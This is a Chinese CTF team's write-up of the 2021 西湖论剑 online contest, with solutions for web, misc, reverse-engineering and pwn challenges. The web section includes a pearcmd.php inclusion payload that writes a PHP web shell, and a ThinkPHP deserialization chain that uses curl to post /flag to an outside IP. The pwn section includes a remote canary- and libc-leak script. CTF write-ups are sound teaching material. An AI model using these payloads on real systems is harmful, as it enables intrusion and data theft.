2021年西湖论剑线上赛 SU Write-up

以下是我们 SU 本次西湖论剑线上赛的 writeup
同时我们也在持续招人，只要你拥有一颗热爱 CTF 的心，都可以加入我们！欢迎发送个人简介至：suers_xctf@126.com或直接联系书鱼(QQ:381382770)

Web

web1

是个信呼的web应用，老洞都打不了，没有给写入的权限，

所以我们需要去找新的利用点

这个地方把他生成的方法类中的displayfile传入到了下面的mpathname中

于是在这个位置就可能会造成

文件包含

然后全局搜索一下那个displayfile

发现在webmain/index/indexAction.php中的getshtmlAction方法里传入一个surl，然后经过拼接传入到了displayfile中，而surl是我们可控的，所以这里确实存在一个文件包含

这里因为拼接了后缀为php，而我们没有上传文件的权限，所以只能包含已经有的文件。然后就想到前阵子p神提出的pearcmd.php的利用。

1	/?+config-create+/&m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vdXNyL2xvY2FsL2xpYi9waHAvcGVhcmNtZA==&/<?=system($_POST[0])?>+/tmp/a.php

然后再去包含生成的a.php就可以rce

index.php?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vdXNyL2xvY2FsL2xpYi9waHAvcGVhcmNtZA==

POST

0=system('/readflag');

EZupload

描述:环境每两分钟重置一次。

.user.ini(auto_prepend_file=”/flag”)
访问Latte的tempdir缓存php文件（2.10.4版本）就可触发.user.ini

TP

先file结合过滤器取读取控制器代码，这里有个直接反序列点；利用tp的路由规则直接来打；2333///public绕一下parse_url就可；

我之前发过两个thinkphp的另反序列化链；

https://www.freebuf.com/articles/web/263458.html

用其中第一个链直接打，然后curl将文件发送过来就可；

<?php

\#bash回显；网页不回显；

namespace League\Flysystem\Cached\Storage{

abstract class AbstractCache

{

 protected $autosave = false;

 protected $complete = [];

 protected $cache = ['`curl -X POST -F xx=@/flag http://120.53.29.60:9900`'];

 }

}

namespace think\filesystem{

use League\Flysystem\Cached\Storage\AbstractCache;

class CacheStore extends AbstractCache

{

 protected $store;

 protected $key;

 public function __construct($store,$key,$expire)

 {

 $this->key = $key;

 $this->store = $store;

 $this->expire = $expire;

 }

}

}

namespace think\cache{

abstract class Driver{

}

}

namespace think\cache\driver{

use think\cache\Driver;

class File extends Driver

{

 protected $options = [

 'expire' => 0,

 'cache_subdir' => false,

 'prefix' => false,

 'path' => 's1mple',

 'hash_type' => 'md5',

 'serialize' => ['system'],

 ];

}

}

namespace{

$b = new think\cache\driver\File();

$a = new think\filesystem\CacheStore($b,'s1mple','1111');

echo urlencode(serialize($a));

}

监听一下就行；

灏妹的web

这题是个信息泄漏，扫一下目录；/.idea/dataSources.xml

这个文件里直接有flag；

Misc

真·签到

进入西湖论剑网络安全大赛微信公众号，发送语音说出“西湖论剑2021，我来了。”即可获得本题 flag：）

yusa的小秘密

Ycrcb隐写提取得到图片，放stegsolve中得到flag

Reverse

ROR

main 函数很清晰

Z3 一把梭

import z3



CHARSET = [0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B,

           0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7,

           0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF,

           0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2,

           0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C,

           0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE,

           0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC,

           0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98,

           0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED,

           0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8,

           0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04,

           0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8,

           0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4,

           0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9,

           0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72,

           0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62,

           0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA,

           0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A,

           0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3,

           0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84,

           0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F,

           0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1,

           0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF,

           0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB,

           0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1,

           0x1B, 0xFB, 0xBA, 0xA7, 0x37, 0x8F]

cipher = [101,  85,  36,  54, 157, 113, 184, 200, 101, 251,

              135, 127, 154, 156, 177, 223, 101, 143, 157,  57,

              143,  17, 246, 142, 101,  66, 218, 180, 140,  57,

              251, 153, 101,  72, 106, 202,  99, 231, 164, 121]

PLAIN = [z3.BitVec("p%d" % i, 8)for i in range(40)]

SHIFT = [0]*8

SHIFT[0] = 128

SHIFT[1] = 64

SHIFT[2] = 32

SHIFT[3] = 16

SHIFT[4] = 8

SHIFT[5] = 4

SHIFT[6] = 2

SHIFT[7] = 1

s = z3.Solver()

for i in range(0, 0x28, 8):

  for j in range(8):

    left = ((SHIFT[j] & PLAIN[i + 3]) << (8 - (3 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 3]) >> ((3 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 2]) << (8 - (2 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 2]) >>

                                                                                                                                                                 ((2 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 1]) << (8 - (1 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 1]) >> ((1 - j) % 8)) | ((SHIFT[j] & PLAIN[i]) << (8 - -j % 8)) | ((SHIFT[j] & PLAIN[i]) >> (-j % 8))

    right = ((SHIFT[j] & PLAIN[i + 7]) << (8 - (7 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 7]) >> ((7 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 6]) << (8 - (6 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 6]) >> ((6 - j) % 8)

                                                                                                                                                                  ) | ((SHIFT[j] & PLAIN[i + 5]) << (8 - (5 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 5]) >> ((5 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 4]) << (8 - (4 - j) % 8)) | ((SHIFT[j] & PLAIN[i + 4]) >> ((4 - j) % 8))

    s.add(left | right == CHARSET.index(cipher[i+j]))

sat = s.check()

m = s.model()

flag = []

for _ in PLAIN:

  tmp = m[_].as_long()

  flag .append(chr(tmp))

print(''.join(flag))

TacticalArmed

TLSCallback0 里头起了个线程

)

线程填充 key

initterm 里面有反调试

这个线程在跑起来之后 IDA 的调试功能就没法用了，所以 patch 掉函数指针

核心部分每次执行的其实都只是一条指令
手动 dump 前面的指令，发现大量的 shr xor 等操作，猜测是 tea，然后发现 delta 变成了 -0x7E5A96D2，密钥是初始化时赋值的，外层循环也能发现轮数改为了 33，并且每次加密后 sum 并没有置为 0

exp

#include <stdint.h>

#include <stdio.h>

#define DELTA -0x7E5A96D2

#define NUM 33

uint32_t gs = 0;

void decrypt(uint32_t* v, uint32_t* k) {

  uint32_t v0 = v[0], v1 = v[1], sum = gs, i;          /* set up */

  uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3]; /* cache key */

  for (i = 0; i < NUM; i++) {                          /* basic cycle start */

    v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);

    v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);

    sum -= DELTA;

  } /* end cycle */

  v[0] = v0;

  v[1] = v1;

}

int main() {

  uint32_t key[] = {0x7CE45630, 0x58334908, 0x66398867, 0x0C35195B1};

  int8_t cipher[40] = {0xED, 0x1D, 0x2F, 0x42, 0x72, 0xE4, 0x85, 0x14, 0xD5, 0x78,

                       0x55, 0x03, 0xA2, 0x80, 0x6B, 0xBF, 0x45, 0x72, 0xD7, 0x97,

                       0xD1, 0x75, 0xAE, 0x2D, 0x63, 0xA9, 0x5F, 0x66, 0x74, 0x6D,

                       0x2E, 0x29, 0xC1, 0xFC, 0x95, 0x97, 0xE9, 0xC8, 0xB5, 0x0B};

  for (int i = 0; i < 40; i += 8) {

    gs += DELTA * NUM;

    decrypt((uint32_t*)(cipher + i), key);

  }

  printf("%s\n",cipher);

}

flag kgD1ogB2yGa2roiAeXiG8_aqnLzCJ_rFHSPrn55K

gghdl

搜索字符串：Wrong 定位关键点。

__int64 __fastcall sub_55CFAE51DCE0(__int64 a1)

{

  int v2; // ebx

  int *v3; // r12

  __int64 v4; // rbp

  __int64 v5; // rbp

  __int64 v6; // rbp

  int *v7; // rbx

  __int64 v8; // r12

  unsigned int v9; // er15

  int v10; // ebp

  char v11; // bp

  __int64 v12; // r15

  unsigned int v13; // ebp

  int v14; // ebp

  char v15; // bp

  __int64 v16; // r15

  unsigned int v17; // ebp

  int v18; // ebp

  char v19; // bp

  __int64 v20; // r15

  unsigned int v21; // ebp

  int v22; // ebp

  char v23; // bp

  __int64 v24; // r15

  unsigned int v25; // ebp

  int v26; // ebp

  char v27; // bp

  int v28; // ecx

  bool v29; // al

  __int64 v30; // r15

  unsigned int v31; // ebp

  int v32; // ebp

  char v33; // bp

  __int64 v34; // rbp

  __int64 v35; // rbp

  __int64 result; // rax

  int v37; // ebx

  __int64 v38; // rbp

  __int64 v39; // rbp

  __int64 v40; // rax

  __int64 v41; // rbp

  __int64 v42; // r15

  int v43; // ebp

  __int64 v44; // rbp

  __int64 i; // rbx

  _BYTE *v46; // rdi

  bool v47; // al

  int v48[2]; // [rsp+8h] [rbp-320h] BYREF

  char v49; // [rsp+10h] [rbp-318h]

  int v50; // [rsp+14h] [rbp-314h]

  int v51[2]; // [rsp+18h] [rbp-310h] BYREF

  char v52; // [rsp+20h] [rbp-308h]

  int v53; // [rsp+24h] [rbp-304h]

  int v54[2]; // [rsp+28h] [rbp-300h] BYREF

  char v55; // [rsp+30h] [rbp-2F8h]

  int v56; // [rsp+34h] [rbp-2F4h]

  int v57[2]; // [rsp+38h] [rbp-2F0h] BYREF

  char v58; // [rsp+40h] [rbp-2E8h]

  int v59; // [rsp+44h] [rbp-2E4h]

  int v60[2]; // [rsp+48h] [rbp-2E0h] BYREF

  char v61; // [rsp+50h] [rbp-2D8h]

  int v62; // [rsp+54h] [rbp-2D4h]

  int v63[2]; // [rsp+58h] [rbp-2D0h] BYREF

  char v64; // [rsp+60h] [rbp-2C8h]

  int v65; // [rsp+64h] [rbp-2C4h]

  int v66[2]; // [rsp+68h] [rbp-2C0h] BYREF

  char v67; // [rsp+70h] [rbp-2B8h]

  int v68; // [rsp+74h] [rbp-2B4h]

  __int64 v69; // [rsp+78h] [rbp-2B0h] BYREF

  char v70; // [rsp+80h] [rbp-2A8h]

  __int64 v71; // [rsp+88h] [rbp-2A0h]

  __int64 v72; // [rsp+90h] [rbp-298h]

  __int64 v73; // [rsp+98h] [rbp-290h]

  __int64 v74; // [rsp+A0h] [rbp-288h]

  __int64 v75; // [rsp+A8h] [rbp-280h]

  __int64 v76; // [rsp+B0h] [rbp-278h]

  int v77; // [rsp+B8h] [rbp-270h] BYREF

  __int64 v78; // [rsp+C0h] [rbp-268h]

  __int64 v79[2]; // [rsp+C8h] [rbp-260h] BYREF

  char v80; // [rsp+D8h] [rbp-250h]

  int v81; // [rsp+DCh] [rbp-24Ch]

  int v82; // [rsp+E0h] [rbp-248h] BYREF

  __int64 v83; // [rsp+E8h] [rbp-240h]

  __int64 v84[2]; // [rsp+F0h] [rbp-238h] BYREF

  char v85; // [rsp+100h] [rbp-228h]

  int v86; // [rsp+104h] [rbp-224h]

  __int64 v87; // [rsp+108h] [rbp-220h]

  int *v88; // [rsp+110h] [rbp-218h]

  int v89; // [rsp+118h] [rbp-210h] BYREF

  __int64 v90; // [rsp+120h] [rbp-208h]

  __int64 v91[2]; // [rsp+128h] [rbp-200h] BYREF

  char v92; // [rsp+138h] [rbp-1F0h]

  int v93; // [rsp+13Ch] [rbp-1ECh]

  int v94; // [rsp+140h] [rbp-1E8h] BYREF

  __int64 v95; // [rsp+148h] [rbp-1E0h]

  int v96; // [rsp+150h] [rbp-1D8h] BYREF

  __int64 v97; // [rsp+158h] [rbp-1D0h]

  __int64 v98[2]; // [rsp+160h] [rbp-1C8h] BYREF

  char v99; // [rsp+170h] [rbp-1B8h]

  int v100; // [rsp+174h] [rbp-1B4h]

  __int64 v101[2]; // [rsp+178h] [rbp-1B0h] BYREF

  __int64 v102[2]; // [rsp+188h] [rbp-1A0h] BYREF

  __int64 v103[2]; // [rsp+198h] [rbp-190h] BYREF

  __int64 v104; // [rsp+1A8h] [rbp-180h] BYREF

  __int64 v105; // [rsp+1B0h] [rbp-178h]

  __int64 v106[2]; // [rsp+1B8h] [rbp-170h] BYREF

  __int64 v107[2]; // [rsp+1C8h] [rbp-160h] BYREF

  __int64 v108; // [rsp+1D8h] [rbp-150h] BYREF

  __int64 v109; // [rsp+1E0h] [rbp-148h]

  __int64 v110[2]; // [rsp+1E8h] [rbp-140h] BYREF

  __int64 v111[2]; // [rsp+1F8h] [rbp-130h] BYREF

  __int64 v112; // [rsp+208h] [rbp-120h] BYREF

  __int64 v113; // [rsp+210h] [rbp-118h]

  __int64 v114[2]; // [rsp+218h] [rbp-110h] BYREF

  __int64 v115[2]; // [rsp+228h] [rbp-100h] BYREF

  __int64 v116; // [rsp+238h] [rbp-F0h] BYREF

  __int64 v117; // [rsp+240h] [rbp-E8h]

  __int64 v118[2]; // [rsp+248h] [rbp-E0h] BYREF

  __int64 v119[2]; // [rsp+258h] [rbp-D0h] BYREF

  __int64 v120; // [rsp+268h] [rbp-C0h] BYREF

  __int64 v121; // [rsp+270h] [rbp-B8h]

  __int64 v122[2]; // [rsp+278h] [rbp-B0h] BYREF

  __int64 v123[2]; // [rsp+288h] [rbp-A0h] BYREF

  __int64 v124; // [rsp+298h] [rbp-90h] BYREF

  __int64 v125; // [rsp+2A0h] [rbp-88h]

  __int64 v126[2]; // [rsp+2A8h] [rbp-80h] BYREF

  __int64 v127; // [rsp+2B8h] [rbp-70h] BYREF

  __int64 v128; // [rsp+2C0h] [rbp-68h]

  __int64 v129[2]; // [rsp+2C8h] [rbp-60h] BYREF

  __int64 v130[3]; // [rsp+2D8h] [rbp-50h] BYREF

  __int64 v131; // [rsp+2F0h] [rbp-38h]



  v2 = *(_DWORD *)(a1 + 276);

  v76 = (__int64)&unk_55CFAE5CC400 + 8;

  v75 = (__int64)&unk_55CFAE5CC440 + 8;

  v74 = (__int64)&unk_55CFAE5CC480 + 8;

  v73 = (__int64)&unk_55CFAE5CC4C0 + 8;

  v72 = (__int64)&unk_55CFAE5CC500 + 8;

  v71 = (__int64)&unk_55CFAE5CC540 + 8;

  v3 = (int *)&unk_55CFAE5F5C58;

  while ( 1 )

  {

    switch ( v2 )

    {

      case 0:

        *(_DWORD *)(a1 + 272) = 0;

        v4 = sub_55CFAE532BBC();

        v98[0] = *(_QWORD *)(a1 + 256);

        v130[0] = (__int64)"Input Flag";

        v130[1] = (__int64)&unk_55CFAE5CC628;

        v98[1] = (__int64)v130;

        v99 = 0;

        v100 = 0;

        sub_55CFAE51BF90(v98);

        *(_QWORD *)(a1 + 256) = v98[0];

        sub_55CFAE532C32(v4);

        v5 = sub_55CFAE532BBC();

        v96 = *v3;

        v97 = *(_QWORD *)(a1 + 256);

        sub_55CFAE51B790(&v96);

        *(_QWORD *)(a1 + 256) = v97;

        sub_55CFAE532C32(v5);

        v6 = sub_55CFAE532BBC();

        v94 = unk_55CFAE5F5C54;

        v95 = *(_QWORD *)(a1 + 240);

        sub_55CFAE518B50(&v94);

        *(_QWORD *)(a1 + 240) = v95;

        sub_55CFAE532C32(v6);

        v131 = *(_QWORD *)(a1 + 240);

        v130[2] = v131 + 16;

        v2 = 2;

        if ( *(unsigned int *)(v131 + 12) >= 0x2CuLL )

          v2 = 1;

        continue;

      case 1:

        *(_QWORD *)(a1 + 280) = 0x2C00000001LL;

        v2 = 6;

        continue;

      case 2:

        v34 = sub_55CFAE532BBC();

        v91[0] = *(_QWORD *)(a1 + 248);

        v129[0] = (__int64)"Wrong!";

        v129[1] = (__int64)&unk_55CFAE5CC658;

        v91[1] = (__int64)v129;

        v92 = 0;

        v93 = 0;

        sub_55CFAE51BF90(v91);

        *(_QWORD *)(a1 + 248) = v91[0];

        sub_55CFAE532C32(v34);

        v35 = sub_55CFAE532BBC();

        v89 = *v3;

        v90 = *(_QWORD *)(a1 + 248);

        sub_55CFAE51B790(&v89);

        *(_QWORD *)(a1 + 248) = v90;

        sub_55CFAE532C32(v35);

        result = sub_55CFAE533790();

        *(_DWORD *)(a1 + 276) = 3;

        return result;

      case 3:

        sub_55CFAE53CB90("hello.vhdl", 43LL, 6LL);

      case 4:

        v2 = 5;

        if ( *(_DWORD *)(a1 + 280) != *(_DWORD *)(a1 + 284) )

        {

          ++*(_DWORD *)(a1 + 280);

          v2 = 6;

        }

        continue;

      case 5:

        v37 = *(_DWORD *)(a1 + 272);

        v38 = sub_55CFAE532BBC();

        if ( v37 == 44 )

        {

          v84[0] = *(_QWORD *)(a1 + 248);

          v102[0] = (__int64)&unk_55CFAE5CC688;

          v102[1] = (__int64)&unk_55CFAE5CC678;

          v84[1] = (__int64)v102;

          v85 = 0;

          v86 = 0;

          sub_55CFAE51BF90(v84);

          *(_QWORD *)(a1 + 248) = v84[0];

          sub_55CFAE532C32(v38);

          v39 = sub_55CFAE532BBC();

          v82 = *v3;

          v83 = *(_QWORD *)(a1 + 248);

          sub_55CFAE51B790(&v82);

          v40 = v83;

        }

        else

        {

          v79[0] = *(_QWORD *)(a1 + 248);

          v101[0] = (__int64)"Wrong!";

          v101[1] = (__int64)&unk_55CFAE5CC698;

          v79[1] = (__int64)v101;

          v80 = 0;

          v81 = 0;

          sub_55CFAE51BF90(v79);

          *(_QWORD *)(a1 + 248) = v79[0];

          sub_55CFAE532C32(v38);

          v39 = sub_55CFAE532BBC();

          v77 = *v3;

          v78 = *(_QWORD *)(a1 + 248);

          sub_55CFAE51B790(&v77);

          v40 = v78;

        }

        *(_QWORD *)(a1 + 248) = v40;

        sub_55CFAE532C32(v39);

        result = sub_55CFAE533790();

        *(_DWORD *)(a1 + 276) = 8;

        return result;

      case 6:

        v41 = sub_55CFAE532BBC();

        v69 = *(_QWORD *)(a1 + 240);

        v70 = 0;

        sub_55CFAE519B90(&v69);

        *(_QWORD *)(a1 + 240) = v69;

        *(_BYTE *)(a1 + 264) = v70;

        sub_55CFAE532C32(v41);

        *(_DWORD *)(a1 + 268) = *(unsigned __int8 *)(a1 + 264);

        v42 = sub_55CFAE532BBC();

        v43 = *(_DWORD *)(a1 + 268);

        if ( v43 < 0 )

          sub_55CFAE53CDDA("hello.vhdl", 48LL);

        sub_55CFAE5131D0(&v127, (unsigned int)v43, 8LL);

        v87 = v127;

        v88 = v66;

        v66[0] = *(_DWORD *)v128;

        v66[1] = *(_DWORD *)(v128 + 4);

        v67 = *(_BYTE *)(v128 + 8);

        v68 = *(_DWORD *)(v128 + 12);

        if ( v68 != 8 )

          sub_55CFAE53CDDA("hello.vhdl", 48LL);

        v44 = v87;

        for ( i = 0LL; (unsigned int)i <= 7; ++i )

        {

          v46 = *(_BYTE **)(a1 + 8 * i + 16);

          *(_BYTE *)(a1 + i + 288) = *(_BYTE *)(v44 + i);

          v47 = 1;

          if ( !v46[42] )

            v47 = *v46 != *(_BYTE *)(a1 + i + 288);

          if ( v47 )

            sub_55CFAE523B0A();

        }

        sub_55CFAE532C32(v42);

        result = sub_55CFAE53381E(1000000LL, "hello.vhdl", 49LL);

        *(_DWORD *)(a1 + 276) = 7;

        return result;

      case 7:

        if ( *(int *)(a1 + 280) > 0 && *(int *)(a1 + 280) < 9 )

        {

          v7 = v3;

          v126[0] = a1 + 152;

          v126[1] = (__int64)&asc_55CFAE5CC3E0[8];

          v8 = sub_55CFAE532BBC();

          v9 = *(_DWORD *)(a1 + 280) - 1;

          if ( v9 >= 8 )

            sub_55CFAE53D036("hello.vhdl", 51LL, v9, v76);

          v10 = dword_55CFAE5CC420[v9];

          if ( v10 < 0 )

            sub_55CFAE53CDDA("hello.vhdl", 51LL);

          sub_55CFAE5131D0(&v124, (unsigned int)v10, 8LL);

          v123[0] = v124;

          v123[1] = (__int64)v63;

          v63[0] = *(_DWORD *)v125;

          v63[1] = *(_DWORD *)(v125 + 4);

          v64 = *(_BYTE *)(v125 + 8);

          v65 = *(_DWORD *)(v125 + 12);

          v11 = sub_55CFAE4FC140(v126, v123);

          sub_55CFAE532C32(v8);

          v3 = v7;

          if ( (v11 & 1) != 0 )

            ++*(_DWORD *)(a1 + 272);

        }

        if ( *(int *)(a1 + 280) >= 9 && *(int *)(a1 + 280) < 17 )

        {

          v122[0] = a1 + 152;

          v122[1] = (__int64)&asc_55CFAE5CC3E0[8];

          v12 = sub_55CFAE532BBC();

          v13 = *(_DWORD *)(a1 + 280) - 9;

          if ( v13 >= 8 )

            sub_55CFAE53D036("hello.vhdl", 56LL, v13, v75);

          v14 = dword_55CFAE5CC460[v13];

          if ( v14 < 0 )

            sub_55CFAE53CDDA("hello.vhdl", 56LL);

          sub_55CFAE5131D0(&v120, (unsigned int)v14, 8LL);

          v119[0] = v120;

          v119[1] = (__int64)v60;

          v60[0] = *(_DWORD *)v121;

          v60[1] = *(_DWORD *)(v121 + 4);

          v61 = *(_BYTE *)(v121 + 8);

          v62 = *(_DWORD *)(v121 + 12);

          v15 = sub_55CFAE4FC140(v122, v119);

          sub_55CFAE532C32(v12);

          if ( (v15 & 1) != 0 )

            ++*(_DWORD *)(a1 + 272);

        }

        if ( *(int *)(a1 + 280) >= 17 && *(int *)(a1 + 280) < 25 )

        {

          v118[0] = a1 + 152;

          v118[1] = (__int64)&asc_55CFAE5CC3E0[8];

          v16 = sub_55CFAE532BBC();

          v17 = *(_DWORD *)(a1 + 280) - 17;

          if ( v17 >= 8 )

            sub_55CFAE53D036("hello.vhdl", 61LL, v17, v74);

          v18 = dword_55CFAE5CC4A0[v17];

          if ( v18 < 0 )

            sub_55CFAE53CDDA("hello.vhdl", 61LL);

          sub_55CFAE5131D0(&v116, (unsigned int)v18, 8LL);

          v115[0] = v116;

          v115[1] = (__int64)v57;

          v57[0] = *(_DWORD *)v117;

          v57[1] = *(_DWORD *)(v117 + 4);

          v58 = *(_BYTE *)(v117 + 8);

          v59 = *(_DWORD *)(v117 + 12);

          v19 = sub_55CFAE4FC140(v118, v115);

          sub_55CFAE532C32(v16);

          if ( (v19 & 1) != 0 )

            ++*(_DWORD *)(a1 + 272);

        }

        if ( *(int *)(a1 + 280) >= 25 && *(int *)(a1 + 280) < 33 )

        {

          v114[0] = a1 + 152;

          v114[1] = (__int64)&asc_55CFAE5CC3E0[8];

          v20 = sub_55CFAE532BBC();

          v21 = *(_DWORD *)(a1 + 280) - 25;

          if ( v21 >= 8 )

            sub_55CFAE53D036("hello.vhdl", 66LL, v21, v73);

          v22 = dword_55CFAE5CC4E0[v21];

          if ( v22 < 0 )

            sub_55CFAE53CDDA("hello.vhdl", 66LL);

          sub_55CFAE5131D0(&v112, (unsigned int)v22, 8LL);

          v111[0] = v112;

          v111[1] = (__int64)v54;

          v54[0] = *(_DWORD *)v113;

          v54[1] = *(_DWORD *)(v113 + 4);

          v55 = *(_BYTE *)(v113 + 8);

          v56 = *(_DWORD *)(v113 + 12);

          v23 = sub_55CFAE4FC140(v114, v111);

          sub_55CFAE532C32(v20);

          if ( (v23 & 1) != 0 )

            ++*(_DWORD *)(a1 + 272);

        }

        if ( *(int *)(a1 + 280) >= 33 && *(int *)(a1 + 280) < 41 )

        {

          v110[0] = a1 + 152;

          v110[1] = (__int64)&asc_55CFAE5CC3E0[8];

          v24 = sub_55CFAE532BBC();

          v25 = *(_DWORD *)(a1 + 280) - 33;

          if ( v25 >= 8 )

            sub_55CFAE53D036("hello.vhdl", 71LL, v25, v72);

          v26 = dword_55CFAE5CC520[v25];

          if ( v26 < 0 )

            sub_55CFAE53CDDA("hello.vhdl", 71LL);

          sub_55CFAE5131D0(&v108, (unsigned int)v26, 8LL);

          v107[0] = v108;

          v107[1] = (__int64)v51;

          v51[0] = *(_DWORD *)v109;

          v51[1] = *(_DWORD *)(v109 + 4);

          v52 = *(_BYTE *)(v109 + 8);

          v53 = *(_DWORD *)(v109 + 12);

          v27 = sub_55CFAE4FC140(v110, v107);

          sub_55CFAE532C32(v24);

          if ( (v27 & 1) != 0 )

            ++*(_DWORD *)(a1 + 272);

        }

        v28 = *(_DWORD *)(a1 + 280);

        v29 = v28 > 40;

        if ( v28 >= 41 )

          v29 = *(_DWORD *)(a1 + 280) < 49;

        v2 = 4;

        if ( v29 )

        {

          v106[0] = a1 + 152;

          v106[1] = (__int64)&asc_55CFAE5CC3E0[8];

          v30 = sub_55CFAE532BBC();

          v31 = *(_DWORD *)(a1 + 280) - 41;

          if ( v31 >= 8 )

            sub_55CFAE53D036("hello.vhdl", 76LL, v31, v71);

          v32 = dword_55CFAE5CC560[v31];

          if ( v32 < 0 )

            sub_55CFAE53CDDA("hello.vhdl", 76LL);

          sub_55CFAE5131D0(&v104, (unsigned int)v32, 8LL);

          v103[0] = v104;

          v103[1] = (__int64)v48;

          v48[0] = *(_DWORD *)v105;

          v48[1] = *(_DWORD *)(v105 + 4);

          v49 = *(_BYTE *)(v105 + 8);

          v50 = *(_DWORD *)(v105 + 12);

          v33 = sub_55CFAE4FC140(v106, v103);

          sub_55CFAE532C32(v30);

          if ( (v33 & 1) != 0 )

            ++*(_DWORD *)(a1 + 272);

        }

        break;

      case 8:

        sub_55CFAE53CB90("hello.vhdl", 88LL, 6LL);

      default:

        sub_55CFAE53CB90("hello.vhdl", 21LL, 6LL);

    }

  }

}

一共就是几个case分支，可以看到case0是输入，case2是输出错误。

case4就是for(int i = 0; i < 44; i++)

case5是最后比较，即看有多少个输入是正确的，当为44时则输出correct。

case6是加密函数，case7就是对单字节加密结果比较了。

密文在case7的分组来的，如第一组密文在如下箭头的地方：

这里还有一点要说的就是程序的sub_5585B8E481D0函数是把数据转化为二进制，但是1用3代替，0用2代替的。

然后这里加密操作，猜测的是异或，因为输入数据在经过case6是变化过的。然后从测试的数据输入与输出得到异或值：0x9c

如我输入的字符7，经过转化后变为了22332333，然后22332333变为了32323233，即0x37变为了0xAB，那么从这可推出：0x37^0xab = 0x9c

最后提取出所有密文解密即可：

enc = [216, 221, 207, 223, 200, 218, 231, 172, 170, 174, 165, 173, 165, 170, 174, 177, 253, 254, 253, 248, 177, 168, 172, 255, 164, 177, 164, 175, 173, 164, 177, 250, 172, 253, 170, 254, 173, 164, 170, 168, 164, 174, 255, 225]



for i in range(len(enc)):

    print(chr(enc[i]^0x9c), end = '')

虚假的粉丝

你是真的粉丝还是虚假的粉丝？

ASCII-faded 1999.txt

key1 和 key2 可以从上面得到（当然也可以逆向出）

Final key 足够大就行了

1	S3Cre7_K3y = Al4N_wAlK3RX

按照逆向的逻辑写脚本（其实等他命令行里播放完看这个文件也行

Exp:

# >>> (hex(ord('A')) + hex(ord('W'))).replace("0x", "")

# '4157'

# >>> ord('F') + ord('a') + ord('d') + ord('e') + ord('d') + ord('i') + ord('s') + ord('b') + ord('e') + ord('s') + ord('t')

# 1118



with open('./f/ASCII-faded 5315.txt', 'rb') as fin:

    f = fin.read()



key = b"Al4N_wAlK3RX"

r = bytearray()

v = 0

for i in range(0, len(f)):

    if v > 10:

        v = 0

    r.append(f[i] ^ key[v])

    v += 1



print(r)



with open('out.txt', 'wb') as fout:

    fout.write(r)

A_TrUe_AW_f4ns

出了

Pwn

String go

简单栈溢出，通过输入-1可以泄漏canary和libc。本来想拿shell，但是为了测试于是用puts函数试着输出一下/bin/sh字符串，但是最后不知道怎么就把flag带出来了。

from pwn import *

context.log_level = 'debug'

# sh = process('./string_go')

sh = remote('82.157.20.104',37600)

context.terminal = ['tmux', 'splitw', '-h']

libc = ELF('libc-2.27.so')



sh.sendlineafter(">>> ","3")

sh.sendlineafter(">>> ","-1+1")

sh.sendlineafter(">>> ","1")



sh.recv(0x10)

sh.recv(0x10)

sh.recv(0x6)

sh.recv(2+0x20)





canary = u64(sh.recv(8))

sh.recv(0xb8)

libc_addr = u64(sh.recv(8)) - (0x7fcd591cbbf7 - 0x7fcd591aa000)



log.success('canary: ' + hex(canary))

log.success('libc_addr: ' + hex(libc_addr))





